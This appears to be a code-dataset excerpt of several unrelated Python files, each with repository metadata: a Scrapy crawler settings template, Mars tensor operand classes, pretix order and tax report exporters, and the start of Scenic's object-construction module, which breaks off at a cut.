# -*- coding: utf-8 -*-
# Scrapy settings for cpe_crawler project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://docs.scrapy.org/en/latest/topics/settings.html
# https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
# https://docs.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'cpe_crawler'
SPIDER_MODULES = ['cpe_crawler.spiders']
NEWSPIDER_MODULE = 'cpe_crawler.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'cpe_crawler (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://docs.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://docs.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'cpe_crawler.middlewares.CpeCrawlerSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'cpe_crawler.middlewares.CpeCrawlerDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://docs.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://docs.scrapy.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'cpe_crawler.pipelines.CpeCrawlerPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| 34.43956
| 103
| 0.776962
|
3597b51de07f524891d592950ce7c131ef6a7588
| 72
|
py
|
Python
|
cheeta_jwt/exception/__init__.py
|
mory0tiki/CG-falcon-jwt
|
1117a031fa0809f0e18c9bf64915c49c133f78b3
|
[
"MIT"
] | 1
|
2019-08-19T06:40:29.000Z
|
2019-08-19T06:40:29.000Z
|
cheeta_jwt/exception/__init__.py
|
mory0tiki/CG-falcon-jwt
|
1117a031fa0809f0e18c9bf64915c49c133f78b3
|
[
"MIT"
] | null | null | null |
cheeta_jwt/exception/__init__.py
|
mory0tiki/CG-falcon-jwt
|
1117a031fa0809f0e18c9bf64915c49c133f78b3
|
[
"MIT"
] | 1
|
2019-08-15T09:45:40.000Z
|
2019-08-15T09:45:40.000Z
|
from cheeta_jwt.exception.validator_exception import ValidatorException
| 36
| 71
| 0.916667
|
a86944fa32a1615a80a079d7c549ddbe68217445
| 3,788
|
py
|
Python
|
mars/tensor/operands.py
|
HarshCasper/mars
|
4c12c968414d666c7a10f497bc22de90376b1932
|
[
"Apache-2.0"
] | 2
|
2019-03-29T04:11:10.000Z
|
2020-07-08T10:19:54.000Z
|
mars/tensor/operands.py
|
HarshCasper/mars
|
4c12c968414d666c7a10f497bc22de90376b1932
|
[
"Apache-2.0"
] | null | null | null |
mars/tensor/operands.py
|
HarshCasper/mars
|
4c12c968414d666c7a10f497bc22de90376b1932
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 1999-2020 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ..serialize import DataTypeField
from ..operands import Operand, TileableOperandMixin, HasInput, ShuffleProxy, MapReduceOperand, \
Fuse, OutputType
from ..utils import calc_nsplits
class TensorOperandMixin(TileableOperandMixin):
__slots__ = ()
_op_module_ = 'tensor'
_output_type_ = OutputType.tensor
def new_tensors(self, inputs, shape=None, dtype=None, order=None, chunks=None, nsplits=None,
output_limit=None, kws=None, **kw):
return self.new_tileables(inputs, shape=shape, chunks=chunks, nsplits=nsplits,
output_limit=output_limit, kws=kws, dtype=dtype, order=order, **kw)
def new_tensor(self, inputs, shape, dtype=None, order=None, **kw):
if getattr(self, 'output_limit') != 1:
raise TypeError('cannot new tensor with more than 1 outputs')
return self.new_tensors(inputs, shape=shape, dtype=dtype, order=order, **kw)[0]
@classmethod
def concat_tileable_chunks(cls, tileable):
from .merge.concatenate import TensorConcatenate
tensor = tileable
assert not tensor.is_coarse()
op = TensorConcatenate(dtype=tensor.dtype)
chunk = TensorConcatenate(dtype=tensor.dtype).new_chunk(
tensor.chunks, shape=tensor.shape, index=(0,) * tileable.ndim)
return op.new_tensor([tensor], tensor.shape, chunks=[chunk],
nsplits=tuple((s,) for s in tensor.shape))
@classmethod
def create_tileable_from_chunks(cls, chunks, inputs=None, **kw):
chunk_idx_to_shape = {c.index: c.shape for c in chunks}
nsplits = calc_nsplits(chunk_idx_to_shape)
shape = tuple(sum(ns) for ns in nsplits)
op = chunks[0].op.copy().reset_key()
return op.new_tensor(inputs, shape=shape, chunks=chunks,
nsplits=nsplits, dtype=chunks[0].dtype, **kw)
def get_fuse_op_cls(self, _):
from .fuse import TensorFuseChunk
return TensorFuseChunk
class TensorOperand(Operand):
_output_type_ = OutputType.tensor
_dtype = DataTypeField('dtype')
@property
def dtype(self):
return getattr(self, '_dtype', None)
class TensorHasInput(HasInput):
_output_type_ = OutputType.tensor
_dtype = DataTypeField('dtype')
@property
def dtype(self):
return getattr(self, '_dtype', None)
class TensorShuffleProxy(ShuffleProxy, TensorOperandMixin):
_output_type_ = OutputType.tensor
_dtype = DataTypeField('dtype')
def __init__(self, dtype=None, **kwargs):
kwargs['_dtype'] = kwargs.get('_dtype', dtype)
super().__init__(**kwargs)
@property
def dtype(self):
return getattr(self, '_dtype', None)
@classmethod
def execute(cls, ctx, op):
pass
class TensorMapReduceOperand(MapReduceOperand):
_output_type_ = OutputType.tensor
_dtype = DataTypeField('dtype')
@property
def dtype(self):
return getattr(self, '_dtype', None)
class TensorFuse(Fuse):
_output_type_ = OutputType.tensor
_dtype = DataTypeField('dtype')
@property
def dtype(self):
return getattr(self, '_dtype', None)
| 32.93913
| 101
| 0.67661
|
dc4e2504328cd3f20a74b188d8a5f12a9485453d
| 24,170
|
py
|
Python
|
src/pretix/plugins/reports/exporters.py
|
fridtjof/pretix
|
b9474675896d5eb6da57fdecc886c287ee4bd27f
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
src/pretix/plugins/reports/exporters.py
|
fridtjof/pretix
|
b9474675896d5eb6da57fdecc886c287ee4bd27f
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
src/pretix/plugins/reports/exporters.py
|
fridtjof/pretix
|
b9474675896d5eb6da57fdecc886c287ee4bd27f
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
import tempfile
from collections import OrderedDict, defaultdict
from decimal import Decimal
import pytz
from dateutil.parser import parse
from django import forms
from django.conf import settings
from django.contrib.staticfiles import finders
from django.db import models
from django.db.models import Max, OuterRef, Subquery, Sum
from django.template.defaultfilters import floatformat
from django.utils.formats import date_format, localize
from django.utils.timezone import get_current_timezone, now
from django.utils.translation import gettext as _, gettext_lazy, pgettext
from reportlab.lib import colors
from reportlab.platypus import PageBreak
from pretix.base.decimal import round_decimal
from pretix.base.exporter import BaseExporter, ListExporter
from pretix.base.models import Order, OrderPosition
from pretix.base.models.event import SubEvent
from pretix.base.models.orders import OrderFee, OrderPayment
from pretix.base.services.stats import order_overview
from pretix.control.forms.filter import OverviewFilterForm
class ReportlabExportMixin:
multiBuild = False # noqa
@property
def pagesize(self):
from reportlab.lib import pagesizes
return pagesizes.portrait(pagesizes.A4)
def render(self, form_data):
self.form_data = form_data
return 'report-%s.pdf' % self.event.slug, 'application/pdf', self.create(form_data)
def get_filename(self):
tz = pytz.timezone(self.event.settings.timezone)
return "%s-%s.pdf" % (self.name, now().astimezone(tz).strftime("%Y-%m-%d-%H-%M-%S"))
@staticmethod
def register_fonts():
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import TTFont
pdfmetrics.registerFont(TTFont('OpenSans', finders.find('fonts/OpenSans-Regular.ttf')))
pdfmetrics.registerFont(TTFont('OpenSansIt', finders.find('fonts/OpenSans-Italic.ttf')))
pdfmetrics.registerFont(TTFont('OpenSansBd', finders.find('fonts/OpenSans-Bold.ttf')))
def get_doc_template(self):
from reportlab.platypus import BaseDocTemplate
return BaseDocTemplate
def create(self, form_data):
from reportlab.lib.units import mm
from reportlab.platypus import PageTemplate
with tempfile.NamedTemporaryFile(suffix=".pdf") as f:
Report.register_fonts()
doc = self.get_doc_template()(f.name, pagesize=self.pagesize,
leftMargin=15 * mm,
rightMargin=15 * mm,
topMargin=20 * mm,
bottomMargin=15 * mm)
doc.addPageTemplates([
PageTemplate(id='All', frames=self.get_frames(doc), onPage=self.on_page, pagesize=self.pagesize)
])
if self.multiBuild:
doc.multiBuild(self.get_story(doc, form_data))
else:
doc.build(self.get_story(doc, form_data))
f.seek(0)
return f.read()
def get_frames(self, doc):
from reportlab.platypus import Frame
self.frame = Frame(doc.leftMargin, doc.bottomMargin,
doc.width,
doc.height,
leftPadding=0,
rightPadding=0,
topPadding=0,
bottomPadding=0,
id='normal')
return [self.frame]
def get_story(self, doc, form_data):
return []
def get_style(self):
from reportlab.lib.styles import getSampleStyleSheet
styles = getSampleStyleSheet()
style = styles["Normal"]
style.fontName = 'OpenSans'
return style
def on_page(self, canvas, doc):
canvas.saveState()
self.page_footer(canvas, doc)
self.page_header(canvas, doc)
canvas.restoreState()
def page_footer(self, canvas, doc):
from reportlab.lib.units import mm
tz = get_current_timezone()
canvas.setFont('OpenSans', 8)
canvas.drawString(15 * mm, 10 * mm, _("Page %d") % (doc.page,))
canvas.drawRightString(self.pagesize[0] - 15 * mm, 10 * mm,
_("Created: %s") % now().astimezone(tz).strftime("%d.%m.%Y %H:%M:%S"))
def get_right_header_string(self):
return settings.PRETIX_INSTANCE_NAME
def get_left_header_string(self):
if self.event.has_subevents:
return "%s – %s" % (self.event.organizer.name, self.event.name)
else:
return "%s – %s – %s" % (self.event.organizer.name, self.event.name,
self.event.get_date_range_display())
def page_header(self, canvas, doc):
from reportlab.lib.units import mm
canvas.setFont('OpenSans', 10)
canvas.drawString(15 * mm, self.pagesize[1] - 15 * mm, self.get_left_header_string())
canvas.drawRightString(self.pagesize[0] - 15 * mm, self.pagesize[1] - 15 * mm,
self.get_right_header_string())
canvas.setStrokeColorRGB(0, 0, 0)
canvas.line(15 * mm, self.pagesize[1] - 17 * mm,
self.pagesize[0] - 15 * mm, self.pagesize[1] - 17 * mm)
class Report(ReportlabExportMixin, BaseExporter):
name = "report"
def verbose_name(self) -> str:
raise NotImplementedError()
def identifier(self) -> str:
raise NotImplementedError()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class OverviewReport(Report):
name = "overview"
identifier = 'pdfreport'
verbose_name = gettext_lazy('Order overview (PDF)')
@property
def pagesize(self):
from reportlab.lib import pagesizes
return pagesizes.landscape(pagesizes.A4)
def get_story(self, doc, form_data):
if form_data.get('date_from'):
form_data['date_from'] = parse(form_data['date_from'])
if form_data.get('date_until'):
form_data['date_until'] = parse(form_data['date_until'])
story = self._table_story(doc, form_data)
if self.event.tax_rules.exists():
story += [PageBreak()]
story += self._table_story(doc, form_data, net=True)
return story
def _table_story(self, doc, form_data, net=False):
from reportlab.lib.units import mm
from reportlab.platypus import Paragraph, Spacer, Table, TableStyle
headlinestyle = self.get_style()
headlinestyle.fontSize = 15
headlinestyle.fontName = 'OpenSansBd'
colwidths = [
a * doc.width for a in (.33, 0.05, .075, 0.05, .075, 0.05, .075, 0.05, .075, 0.05, .075)
]
tstyledata = [
('SPAN', (1, 0), (2, 0)),
('SPAN', (3, 0), (4, 0)),
('SPAN', (5, 0), (-1, 0)),
('SPAN', (5, 1), (6, 1)),
('SPAN', (7, 1), (8, 1)),
('SPAN', (9, 1), (10, 1)),
('ALIGN', (0, 0), (-1, 1), 'CENTER'),
('ALIGN', (1, 2), (-1, -1), 'RIGHT'),
('VALIGN', (0, 0), (-1, -1), 'MIDDLE'),
('FONTNAME', (0, 0), (-1, 1), 'OpenSansBd'),
('FONTNAME', (0, -1), (-1, -1), 'OpenSansBd'),
('FONTSIZE', (0, 0), (-1, -1), 9),
('LINEBEFORE', (1, 0), (1, -1), 1, colors.lightgrey),
('LINEBEFORE', (3, 0), (3, -1), 1, colors.lightgrey),
('LINEBEFORE', (5, 0), (5, -1), 1, colors.lightgrey),
('LINEBEFORE', (7, 1), (7, -1), 1, colors.lightgrey),
('LINEBEFORE', (9, 1), (9, -1), 1, colors.lightgrey),
]
story = [
Paragraph(_('Orders by product') + ' ' + (_('(excl. taxes)') if net else _('(incl. taxes)')), headlinestyle),
Spacer(1, 5 * mm)
]
if form_data.get('date_axis'):
story += [
Paragraph(_('{axis} between {start} and {end}').format(
axis=dict(OverviewFilterForm(event=self.event).fields['date_axis'].choices)[form_data.get('date_axis')],
start=date_format(form_data.get('date_from'), 'SHORT_DATE_FORMAT') if form_data.get('date_from') else '–',
end=date_format(form_data.get('date_until'), 'SHORT_DATE_FORMAT') if form_data.get('date_until') else '–',
), self.get_style()),
Spacer(1, 5 * mm)
]
if form_data.get('subevent'):
try:
subevent = self.event.subevents.get(pk=self.form_data.get('subevent'))
except SubEvent.DoesNotExist:
subevent = self.form_data.get('subevent')
story.append(Paragraph(pgettext('subevent', 'Date: {}').format(subevent), self.get_style()))
story.append(Spacer(1, 5 * mm))
tdata = [
[
_('Product'), _('Canceled'), '', _('Expired'), '', _('Purchased'),
'', '', '', '', ''
],
[
'', '', '', '', '', _('Pending'), '', _('Paid'), '', _('Total'), ''
],
[
'',
_('#'), self.event.currency,
_('#'), self.event.currency,
_('#'), self.event.currency,
_('#'), self.event.currency,
_('#'), self.event.currency,
],
]
items_by_category, total = order_overview(
self.event,
subevent=form_data.get('subevent'),
date_filter=form_data.get('date_axis'),
date_from=form_data.get('date_from'),
date_until=form_data.get('date_until'),
fees=True
)
places = settings.CURRENCY_PLACES.get(self.event.currency, 2)
states = (
('canceled', Order.STATUS_CANCELED),
('expired', Order.STATUS_EXPIRED),
('pending', Order.STATUS_PENDING),
('paid', Order.STATUS_PAID),
('total', None),
)
for tup in items_by_category:
if tup[0]:
tstyledata.append(('FONTNAME', (0, len(tdata)), (-1, len(tdata)), 'OpenSansBd'))
tdata.append([
tup[0].name,
])
for l, s in states:
tdata[-1].append(str(tup[0].num[l][0]))
tdata[-1].append(floatformat(tup[0].num[l][2 if net else 1], places))
for item in tup[1]:
tdata.append([
str(item)
])
for l, s in states:
tdata[-1].append(str(item.num[l][0]))
tdata[-1].append(floatformat(item.num[l][2 if net else 1], places))
if item.has_variations:
for var in item.all_variations:
tdata.append([
" " + str(var),
])
for l, s in states:
tdata[-1].append(str(var.num[l][0]))
tdata[-1].append(floatformat(var.num[l][2 if net else 1], places))
tdata.append([
_("Total"),
])
for l, s in states:
tdata[-1].append(str(total['num'][l][0]))
tdata[-1].append(floatformat(total['num'][l][2 if net else 1], places))
table = Table(tdata, colWidths=colwidths, repeatRows=3)
table.setStyle(TableStyle(tstyledata))
story.append(table)
return story
@property
def export_form_fields(self) -> dict:
f = OverviewFilterForm(event=self.event)
del f.fields['ordering']
return f.fields
class OrderTaxListReportPDF(Report):
name = "ordertaxlist"
identifier = 'ordertaxes'
verbose_name = gettext_lazy('List of orders with taxes (PDF)')
@property
def export_form_fields(self):
return OrderedDict(
[
('status',
forms.MultipleChoiceField(
label=gettext_lazy('Filter by status'),
initial=[Order.STATUS_PAID],
choices=Order.STATUS_CHOICE,
widget=forms.CheckboxSelectMultiple,
required=False
)),
('sort',
forms.ChoiceField(
label=gettext_lazy('Sort by'),
initial='datetime',
choices=(
('datetime', gettext_lazy('Order date')),
('payment_date', gettext_lazy('Payment date')),
),
widget=forms.RadioSelect,
required=False
)),
]
)
@property
def pagesize(self):
from reportlab.lib import pagesizes
return pagesizes.landscape(pagesizes.A4)
def get_story(self, doc, form_data):
from reportlab.lib.units import mm
from reportlab.platypus import Paragraph, Spacer, Table, TableStyle
headlinestyle = self.get_style()
headlinestyle.fontSize = 15
headlinestyle.fontName = 'OpenSansBd'
tz = pytz.timezone(self.event.settings.timezone)
tax_rates = set(
a for a
in OrderFee.objects.filter(
order__event=self.event
).values_list('tax_rate', flat=True).distinct().order_by()
)
tax_rates |= set(
a for a
in OrderPosition.objects.filter(order__event=self.event).filter(
order__status__in=self.form_data['status']
).values_list('tax_rate', flat=True).distinct().order_by()
)
tax_rates = sorted(tax_rates)
# Cols: Order ID | Order date | Status | Payment Date | Total | {gross tax} for t in taxes
colwidths = [a * doc.width for a in [0.12, 0.1, 0.10, 0.12, 0.08]]
if tax_rates:
colwidths += [0.48 / (len(tax_rates) * 2) * doc.width] * (len(tax_rates) * 2)
tstyledata = [
# Alignment
('ALIGN', (0, 0), (3, 0), 'LEFT'), # Headlines
('ALIGN', (4, 0), (-1, 0), 'CENTER'), # Headlines
('ALIGN', (4, 1), (-1, -1), 'RIGHT'), # Money
('VALIGN', (0, 0), (-1, -1), 'MIDDLE'),
# Fonts
('FONTNAME', (0, 0), (-1, 0), 'OpenSansBd'), # Headlines
('FONTNAME', (0, -1), (-1, -1), 'OpenSansBd'), # Sums
]
for i, rate in enumerate(tax_rates):
tstyledata.append(('SPAN', (5 + 2 * i, 0), (6 + 2 * i, 0)))
story = [
Paragraph(_('Orders by tax rate ({currency})').format(currency=self.event.currency), headlinestyle),
Spacer(1, 5 * mm)
]
tdata = [
[
_('Order code'), _('Order date'), _('Status'), _('Payment date'), _('Order total'),
] + sum(([localize(t) + ' %', ''] for t in tax_rates), []),
[
'', '', '', '', ''
] + sum(([_('Gross'), _('Tax')] for t in tax_rates), []),
]
op_date = OrderPayment.objects.filter(
order=OuterRef('order'),
state__in=(OrderPayment.PAYMENT_STATE_CONFIRMED, OrderPayment.PAYMENT_STATE_REFUNDED),
payment_date__isnull=False
).values('order').annotate(
m=Max('payment_date')
).values(
'm'
).order_by()
qs = OrderPosition.objects.filter(
order__status__in=self.form_data['status'],
order__event=self.event,
).annotate(payment_date=Subquery(op_date, output_field=models.DateTimeField())).values(
'order__code', 'order__datetime', 'payment_date', 'order__total', 'tax_rate', 'order__status',
'order__id'
).annotate(prices=Sum('price'), tax_values=Sum('tax_value')).order_by(
'order__datetime' if self.form_data['sort'] == 'datetime' else 'payment_date',
'order__datetime',
'order__code'
)
fee_sum_cache = {
(o['order__id'], o['tax_rate']): o for o in
OrderFee.objects.values('tax_rate', 'order__id').order_by().annotate(
taxsum=Sum('tax_value'), grosssum=Sum('value')
)
}
last_order_code = None
tax_sums = defaultdict(Decimal)
price_sums = defaultdict(Decimal)
status_labels = dict(Order.STATUS_CHOICE)
for op in qs:
if op['order__code'] != last_order_code:
tdata.append(
[
op['order__code'],
date_format(op['order__datetime'].astimezone(tz), "SHORT_DATE_FORMAT"),
status_labels[op['order__status']],
date_format(op['payment_date'], "SHORT_DATE_FORMAT") if op['payment_date'] else '',
op['order__total']
] + sum((['', ''] for t in tax_rates), []),
)
last_order_code = op['order__code']
for i, rate in enumerate(tax_rates):
odata = fee_sum_cache.get((op['order__id'], rate))
if odata:
tdata[-1][5 + 2 * i] = odata['grosssum'] or Decimal('0.00')
tdata[-1][6 + 2 * i] = odata['taxsum'] or Decimal('0.00')
tax_sums[rate] += odata['taxsum'] or Decimal('0.00')
price_sums[rate] += odata['grosssum'] or Decimal('0.00')
i = tax_rates.index(op['tax_rate'])
tdata[-1][5 + 2 * i] = (tdata[-1][5 + 2 * i] or Decimal('0.00')) + op['prices']
tdata[-1][6 + 2 * i] = (tdata[-1][6 + 2 * i] or Decimal('0.00')) + op['tax_values']
tax_sums[op['tax_rate']] += op['tax_values']
price_sums[op['tax_rate']] += op['prices']
tdata.append(
[
_('Total'), '', '', '', ''
] + sum(([
price_sums.get(t) or Decimal('0.00'),
tax_sums.get(t) or Decimal('0.00')
] for t in tax_rates), []),
)
tdata = [
[
localize(round_decimal(c, self.event.currency))
if isinstance(c, (Decimal, int, float))
else c
for c in row
] for row in tdata
]
table = Table(tdata, colWidths=colwidths, repeatRows=2)
table.setStyle(TableStyle(tstyledata))
story.append(table)
return story
class OrderTaxListReport(ListExporter):
identifier = 'ordertaxeslist'
verbose_name = gettext_lazy('List of orders with taxes')
@property
def export_form_fields(self):
f = super().export_form_fields
f.update(OrderedDict(
[
('status',
forms.MultipleChoiceField(
label=_('Filter by status'),
initial=[Order.STATUS_PAID],
choices=Order.STATUS_CHOICE,
widget=forms.CheckboxSelectMultiple,
required=False
)),
('sort',
forms.ChoiceField(
label=_('Sort by'),
initial='datetime',
choices=(
('datetime', gettext_lazy('Order date')),
('payment_date', gettext_lazy('Payment date')),
),
widget=forms.RadioSelect,
required=False
)),
]
))
return f
def iterate_list(self, form_data):
tz = pytz.timezone(self.event.settings.timezone)
tax_rates = set(
a for a
in OrderFee.objects.filter(
order__event=self.event
).values_list('tax_rate', flat=True).distinct().order_by()
)
tax_rates |= set(
a for a
in OrderPosition.objects.filter(order__event=self.event).filter(
order__status__in=form_data['status']
).values_list('tax_rate', flat=True).distinct().order_by()
)
tax_rates = sorted(tax_rates)
headers = [
_('Order code'), _('Order date'),
_('Company'), _('Name'),
_('Country'), _('VAT ID'), _('Status'), _('Payment date'), _('Order total'),
] + sum(([str(t) + ' % ' + _('Gross'), str(t) + ' % ' + _('Tax')] for t in tax_rates), [])
yield headers
op_date = OrderPayment.objects.filter(
order=OuterRef('order'),
state__in=(OrderPayment.PAYMENT_STATE_CONFIRMED, OrderPayment.PAYMENT_STATE_REFUNDED),
payment_date__isnull=False
).values('order').annotate(
m=Max('payment_date')
).values(
'm'
).order_by()
qs = OrderPosition.objects.filter(
order__status__in=form_data['status'],
order__event=self.event,
).annotate(payment_date=Subquery(op_date, output_field=models.DateTimeField())).values(
'order__code', 'order__datetime', 'payment_date', 'order__total', 'tax_rate', 'order__status',
'order__id', 'order__invoice_address__name_cached', 'order__invoice_address__company',
'order__invoice_address__country', 'order__invoice_address__vat_id'
).annotate(prices=Sum('price'), tax_values=Sum('tax_value')).order_by(
'order__datetime' if form_data['sort'] == 'datetime' else 'payment_date',
'order__datetime',
'order__code'
)
fee_sum_cache = {
(o['order__id'], o['tax_rate']): o for o in
OrderFee.objects.values('tax_rate', 'order__id').order_by().annotate(
taxsum=Sum('tax_value'), grosssum=Sum('value')
)
}
last_order_code = None
tax_sums = defaultdict(Decimal)
price_sums = defaultdict(Decimal)
status_labels = dict(Order.STATUS_CHOICE)
row = None
for op in qs:
if op['order__code'] != last_order_code:
if row:
yield row
row = None
row = [
op['order__code'],
date_format(op['order__datetime'].astimezone(tz), "SHORT_DATE_FORMAT"),
op['order__invoice_address__company'],
op['order__invoice_address__name_cached'],
op['order__invoice_address__country'],
op['order__invoice_address__vat_id'],
status_labels[op['order__status']],
date_format(op['payment_date'], "SHORT_DATE_FORMAT") if op['payment_date'] else '',
round_decimal(op['order__total'], self.event.currency),
] + sum(([Decimal('0.00'), Decimal('0.00')] for t in tax_rates), [])
last_order_code = op['order__code']
for i, rate in enumerate(tax_rates):
odata = fee_sum_cache.get((op['order__id'], rate))
if odata:
row[9 + 2 * i] = odata['grosssum'] or 0
row[10 + 2 * i] = odata['taxsum'] or 0
tax_sums[rate] += odata['taxsum'] or 0
price_sums[rate] += odata['grosssum'] or 0
i = tax_rates.index(op['tax_rate'])
row[9 + 2 * i] = round_decimal(row[9 + 2 * i] + op['prices'], self.event.currency)
row[10 + 2 * i] = round_decimal(row[10 + 2 * i] + op['tax_values'], self.event.currency)
tax_sums[op['tax_rate']] += op['tax_values']
price_sums[op['tax_rate']] += op['prices']
if row:
yield row
yield [
_('Total'), '', '', '', '', '', '', '', ''
] + sum(([
round_decimal(price_sums.get(t) or Decimal('0.00'), self.event.currency),
round_decimal(tax_sums.get(t) or Decimal('0.00'), self.event.currency)
] for t in tax_rates), [])
| 39.818781
| 126
| 0.525983
|
3f4ded892f044dd2e8cee91c380489c8cfd8ff0c
| 19,127
|
py
|
Python
|
src/scenic/core/object_types.py
|
ArenBabikian/Scenic
|
5687d9a70c0e6588ee0cda81b4a4a6731bcd2d91
|
[
"BSD-3-Clause"
] | null | null | null |
src/scenic/core/object_types.py
|
ArenBabikian/Scenic
|
5687d9a70c0e6588ee0cda81b4a4a6731bcd2d91
|
[
"BSD-3-Clause"
] | null | null | null |
src/scenic/core/object_types.py
|
ArenBabikian/Scenic
|
5687d9a70c0e6588ee0cda81b4a4a6731bcd2d91
|
[
"BSD-3-Clause"
] | null | null | null |
"""Implementations of the built-in Scenic classes."""
import collections
import math
import random
from scenic.core.distributions import Samplable, needsSampling
from scenic.core.specifiers import Specifier, PropertyDefault
from scenic.core.vectors import Vector
from scenic.core.geometry import (_RotatedRectangle, averageVectors, hypot, min, viewAngleToPoint, distanceToSegment, radialToCartesian)
from scenic.core.regions import CircularRegion, SectorRegion
from scenic.core.type_support import toVector, toHeading, toType
from scenic.core.lazy_eval import needsLazyEvaluation
from scenic.core.utils import DefaultIdentityDict, areEquivalent, cached_property
from scenic.core.errors import RuntimeParseError
## Abstract base class
class _Constructible(Samplable):
"""Abstract base class for Scenic objects.
Scenic objects, which are constructed using specifiers, are implemented
internally as instances of ordinary Python classes. This abstract class
implements the procedure to resolve specifiers and determine values for
the properties of an object, as well as several common methods supported
by objects.
"""
def __init_subclass__(cls):
super().__init_subclass__()
# find all defaults provided by the class or its superclasses
allDefs = collections.defaultdict(list)
for sc in cls.__mro__:
if issubclass(sc, _Constructible) and hasattr(sc, '__annotations__'):
for prop, value in sc.__annotations__.items():
allDefs[prop].append(PropertyDefault.forValue(value))
# resolve conflicting defaults and gather dynamic properties
resolvedDefs = {}
dyns = []
for prop, defs in allDefs.items():
primary, rest = defs[0], defs[1:]
spec = primary.resolveFor(prop, rest)
resolvedDefs[prop] = spec
if any(defn.isDynamic for defn in defs):
dyns.append(prop)
cls._defaults = resolvedDefs
cls._dynamicProperties = tuple(dyns)
@classmethod
def withProperties(cls, props):
assert all(reqProp in props for reqProp in cls._defaults)
assert all(not needsLazyEvaluation(val) for val in props.values())
return cls(_internal=True, **props)
def __init__(self, *args, _internal=False, **kwargs):
if _internal: # Object is being constructed internally; use fast path
assert not args
for prop, value in kwargs.items():
assert not needsLazyEvaluation(value), (prop, value)
object.__setattr__(self, prop, value)
super().__init__(kwargs.values())
self.properties = set(kwargs.keys())
return
# Validate specifiers
name = self.__class__.__name__
specifiers = list(args)
for prop, val in kwargs.items(): # kwargs supported for internal use
specifiers.append(Specifier(prop, val, internal=True))
properties = dict()
optionals = collections.defaultdict(list)
defs = self.__class__._defaults
for spec in specifiers:
assert isinstance(spec, Specifier), (name, spec)
prop = spec.property
if prop in properties:
raise RuntimeParseError(f'property "{prop}" of {name} specified twice')
properties[prop] = spec
for opt in spec.optionals:
if opt in defs: # do not apply optionals for properties this object lacks
optionals[opt].append(spec)
# Decide which optionals to use
optionalsForSpec = collections.defaultdict(set)
for opt, specs in optionals.items():
if opt in properties:
continue # optionals do not override a primary specification
if len(specs) > 1:
raise RuntimeParseError(f'property "{opt}" of {name} specified twice (optionally)')
assert len(specs) == 1
spec = specs[0]
properties[opt] = spec
optionalsForSpec[spec].add(opt)
# Add any default specifiers needed
for prop in defs:
if prop not in properties:
spec = defs[prop]
specifiers.append(spec)
properties[prop] = spec
# Topologically sort specifiers
order = []
seen, done = set(), set()
def dfs(spec):
if spec in done:
return
elif spec in seen:
raise RuntimeParseError(f'specifier for property {spec.property} '
'depends on itself')
seen.add(spec)
for dep in spec.requiredProperties:
child = properties.get(dep)
if child is None:
raise RuntimeParseError(f'property {dep} required by '
f'specifier {spec} is not specified')
else:
dfs(child)
order.append(spec)
done.add(spec)
for spec in specifiers:
dfs(spec)
assert len(order) == len(specifiers)
# Evaluate and apply specifiers
self.properties = set() # will be filled by calls to _specify below
self._evaluated = DefaultIdentityDict() # temporary cache for lazily-evaluated values
for spec in order:
spec.applyTo(self, optionalsForSpec[spec])
del self._evaluated
# Set up dependencies
deps = []
for prop in properties:
assert hasattr(self, prop)
val = getattr(self, prop)
deps.append(val)
super().__init__(deps)
# Possibly register this object
self._register()
def _specify(self, prop, value):
